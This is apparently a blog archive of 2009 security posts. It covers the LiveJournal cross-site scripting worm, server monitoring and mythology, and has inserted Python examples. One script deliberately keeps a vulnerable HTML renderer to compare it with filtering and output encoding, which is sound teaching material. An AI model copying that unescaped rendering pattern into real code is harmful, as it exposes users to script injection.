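    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def browser_sees(rendered: str):
    """Return (tags, event handlers) the browser would parse out of the fragment."""
    p = TagCollector()
    p.feed(rendered)
    p.close()
    return p.tags, p.handlers


if __name__ == "__main__":
    for s in SAMPLES:
        print("raw     :", browser_sees(render_vulnerable(s)))
        print("filtered:", browser_sees(render_vulnerable(whitelist_filter(s))),
              repr(whitelist_filter(s)))
        print("encoded :", browser_sees(render_safe(s)))
```

Both defences stop the script tag and the onerror handler. The difference shows up on the last sample: the whitelist silently turns “Café Müller” into “Caf Mller”, while output encoding leaves the customer’s text intact and still yields nothing but a paragraph. The whitelist also has to be applied at every form, API and import path, whereas the encoding lives in the one function that writes to the page.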

However, if it’s on a third party website, your options are a trifle more limited.  You don’t know what they allow or disallow.  You don’t know what other users are going to post, or even who they may be.  What you do know, though, is that there will be attacks.  Do you trust them?

Odds are that the answer is “no”.

The good news is that there is a simple test that works on both your own website and the third party systems.  Just log in and take stock of what data of yours is visible.  If an attacker gets in, they will run attacks as you.  If your local workstation is protected, you can probably assume that the attack will be limited to the context of the website itself.  Thus, you can limit what an attacker can get to by simply controlling the data that you allow online.

So here are two good rules of thumb:

  1. If you don’t need to put pieces of data online, don’t.
  2. If the site requires information that you don’t want to give, either don’t use the site or make something up.

Small Business Attack – Cross Site Scripting

  • At October 14, 2009
  • By Josh More
  • In Business Security
  • 0

On September 23rd, LiveJournal was attacked. The attackers used Flash. When the Flash file was loaded, it ran within the context of the user who was logged in and made changes to recent posts. This allowed the attack to spread friend-to-friend. It also harvested email addresses.

Doesn’t sound like much, does it? After all, it’s basically a Flash virus that steals email addresses, right? What’s new there?

Well, let’s look at the one thing that makes LiveJournal a successful site. At its core, it allows users to post content and share links with one another. In order to block the attack, the admins had to effectively break the site until they tracked it down. The one thing that LiveJournal requires is the same thing that the attacker was able to use to get in. In fact, given what it does, there may not be a way to secure the system and still give users what they want.

OK, then, suppose you accept the fact that you’re going to be successfully attacked. How do you protect yourself?

It’s interesting to note that the attackers just wanted email addresses. Odds are that they could have gotten other things too. However, since many people publish their list of friends, it would be trivial to link those email addresses to other email addresses. Now, if you have a database of email addresses and the email addresses of people that are their friends, you have just what you need to run a phishing attack.

Do you allow your customers to post content on your website? Do you use any websites that allow you or your associates to post content? How are you protecting your data?

Note: since I wrote this post, but before it was posted, Reddit was similarly attacked.

Security Lessons from Nature – Status monitoring

  • At October 13, 2009
  • By Josh More
  • In Natural History
  • 0

I weigh between 150 and 155 pounds. What’s interesting is that, under ideal conditions, it is exactly between 150 and 155. I weigh myself regularly, and I have noticed that if my weight ever drops below 150, I get sick within a day. The same applies if it holds steady over 155 for more than a couple of days. Similarly, I have an average temperature range, and any significant variance typically bodes ill(ness).

The human body (really, all mammals) has many such metrics. In addition to weight and temp, there is an average heart rate, normal EKG, bone density and typical levels of vitamins, minerals and hormones. These can be measured in many ways, but they generally fall into two categories. Some things can be measured at a surface level (weight and temp), others require special equipment, a tolerance of invasive procedures and significant amounts of time. Of course, the more time you devote to it, the better the data you get, so these scans are generally only done when a problem is suspected.

The same applies to IT systems. There are certain metrics that are easily determined and if they vary, it can indicate a problem. Just like weight and temperature, some can be easily gathered, gathering others can impact the system, and some require the system to be down before they can be gathered.

Just like we generally don’t send people in for a full body scan on a regular basis, we aren’t in the habit of shutting down servers for a day each week and performing precautionary forensic analysis upon them. Instead, we prefer to check surface-level data: Disk, CPU and RAM usage, network connection statistics. If one of these indicates a problem, then and only then do we begin to dig more deeply and run scans that might impact system performance.

The key, just like my regular monitoring of my weight and temp, is to regularly monitor system performance metrics. Otherwise, you only catch problems after they’ve already impacted the system. Just as it’s easiest to deal with a cold before it really sets in, it’s easier to identify an attack at the beginning of the process.
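Here is what “stepping on the scale every morning” looks like for a server, as an added example that is not part of the post. It learns a normal band for three cheap surface-level metrics from a constructed history (the readings are made up for the illustration), then checks each new reading the way the weight rule above does: a hard limit fires at once, while a reading that merely drifts out of its band only fires after it has held there for a few samples in a row, so a single blip doesn’t page anyone.

```python
import statistics

# Constructed history (assumptions, not data from the post): 24 hourly readings of
# (disk_pct, cpu_pct, established_connections) from a quiet server.
HISTORY = [(61.0 + (i % 3) * 0.2, 12.0 + (i % 5), 40 + (i * 7) % 11) for i in range(24)]

METRICS = ("disk_pct", "cpu_pct", "connections")
K_SIGMA = 3.0                      # how far from the baseline counts as out of range
PERSIST = 3                        # consecutive out-of-range samples before alerting
HARD_LIMITS = {"disk_pct": 95.0}   # like "below 150 lb": always worth a look, right now


class BaselineMonitor:
    """Learn a normal band per metric, then flag hard-limit hits immediately and
    sustained drift only once it has persisted."""

    def __init__(self, history, k=K_SIGMA, persist=PERSIST, hard_limits=HARD_LIMITS):
        self.bands = {}
        for name, col in zip(METRICS, zip(*history)):
            mean = statistics.mean(col)
            sd = statistics.pstdev(col) or 1.0   # avoid a zero-width band on a flat metric
            self.bands[name] = (mean - k * sd, mean + k * sd)
        self.persist = persist
        self.hard_limits = hard_limits
        self.streak = {name: 0 for name in METRICS}

    def check(self, sample):
        """Evaluate one reading; returns a list of (metric, reason, value) alerts."""
        alerts = []
        for name, value in zip(METRICS, sample):
            lo, hi = self.bands[name]
            out_of_band = not (lo <= value <= hi)
            self.streak[name] = self.streak[name] + 1 if out_of_band else 0
            if name in self.hard_limits and value >= self.hard_limits[name]:
                alerts.append((name, "hard-limit", value))
            elif self.streak[name] == self.persist:      # alert once, when it becomes sustained
                alerts.append((name, "sustained", value))
        return alerts


def run_series(monitor, samples):
    """Feed a sequence of readings through the monitor; return (index, alert) pairs."""
    return [(i, alert) for i, s in enumerate(samples) for alert in monitor.check(s)]


if __name__ == "__main__":
    m = BaselineMonitor(HISTORY)
    print({k: tuple(round(x, 1) for x in v) for k, v in m.bands.items()})
    # Constructed "today": a blip, then a sustained connection spike, then a full disk.
    today = [(61.2, 13.0, 44), (61.2, 13.0, 400), (61.2, 13.0, 45),
             (61.2, 14.0, 400), (61.2, 14.0, 410), (61.2, 15.0, 405), (97.0, 13.0, 44)]
    for i, alert in run_series(m, today):
        print(f"sample {i}: {alert}")
```

The connection count is the one to watch here: a sudden, sustained jump in established connections on a box that normally idles is often the first surface symptom of a compromise (a scanner, a bot, or someone’s interactive session), and it is visible long before anything shows up in a deep scan. Tune K_SIGMA and PERSIST against your own history rather than copying the values above.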

Mythic Monday – Alternate Worlds

  • At October 12, 2009
  • By Josh More
  • In Mythology
  • 0

There is an interesting thing about studying Myth.  Looking just at origin stories, there is a basic belief that each culture has but one.  However, this isn’t true.  Most cultures have many stories.  Historically, this may be due to the constant culture clashes of warring tribes, where differing cultures absorbed parts of one another and partially merged in order to avoid utter annihilation.  Politically, it may be because no matter how the rulers divided the maps, the people stayed more or less the same, and gods and goddesses were simply added into hierarchies (until we got to monotheism and saints started to serve this role).  However, sociologically, what’s fascinating is that the stories can conflict and still both be viewed as true.

The human mind, apparently, has a desire to know and believe in the one universal truth, but doesn’t seem to have to deal with the cognitive dissonance around conflicting worlds. This has even been studied:

An initial study involved 50 three- and four-year-olds. Each child sat with two experimenters, a toy bear, a toy doll and a central pile of toy blocks. The first experimenter, located to the right, introduced the child to the doll Mary; together they pretended it was her bath-time and the child used one or more blocks as bath objects, such as soap. Then the second experimenter, located to the left, introduced the child to Bruno the bear. They pretended it was his bedtime and the child used one or more blocks in the game, for example as a pillow.

The crucial part came next, as the first experimenter told the child that Mary had grown tired and needed to sleep, whilst Bruno had woken and wanted to wash. Rather than using the toy block already established to be a pillow in Bruno’s world, the children, regardless of age, nearly always reached for a new block from the pile to use as a pillow for Mary.

In short, kids seem to resolve the conflict by constructing an alternate world for each story.  In their minds, anything can happen within one world, but events in one world cannot cross over to the other.  This keeps things simple and easily understood.  Sure, we play with the idea here and there. We cross genres in the movies, comics and literature.  However, even within these genres, you’ll find that there is a not-insignificant number of people who can easily point out half a dozen logical flaws in each story. It doesn’t matter how careful you are, the flaws seem to inevitably exist and leap right out at anyone who cares to look.

So, it would seem that we’re wired to allow for almost infinite flexibility but only so long as it stays segmented.  So I have to ask, why do we insist on tearing down the walls?

I’ve seen numerous environments where, for one reason or another, there are a mix of technologies in play.  This makes sense.  There are good reasons to use both Microsoft and Linux operating systems in an environment.  The same goes for firewalls (Cisco/Astaro), endpoint protection (Sophos/Bit9) and word processing (MS Office/OpenOffice).  Each of these technologies is powerful and can bring definite business advantages.

However, the point here is that each should be kept isolated, as much as possible.  From a security perspective, one can use flaws in one product to escalate an attack on another. Operationally, trying to connect diverse systems means that you are making both of them work in non-intended ways, which means that subject matter experts in both tend to point fingers at one another.

That’s not to say that every technology should be kept isolated. Not at all. Technology tends to fall into specific worlds. There are three primary Linux worlds: Ubuntu/Debian, SuSE and Red Hat. Each of these worlds has its own repositories, and is built to be more or less complete. Microsoft Windows tends to be a bit less well defined, but it still has its set of technologies that are designed to inter-operate with one another and not necessarily with anything else. Yes, you can try to force it… but as the article shows, we don’t naturally think that way, so there may be problems.

Josh More - Entropologist
Expert in removing chaos from
I.T. and business systems.

Copyright © 2013 by Josh More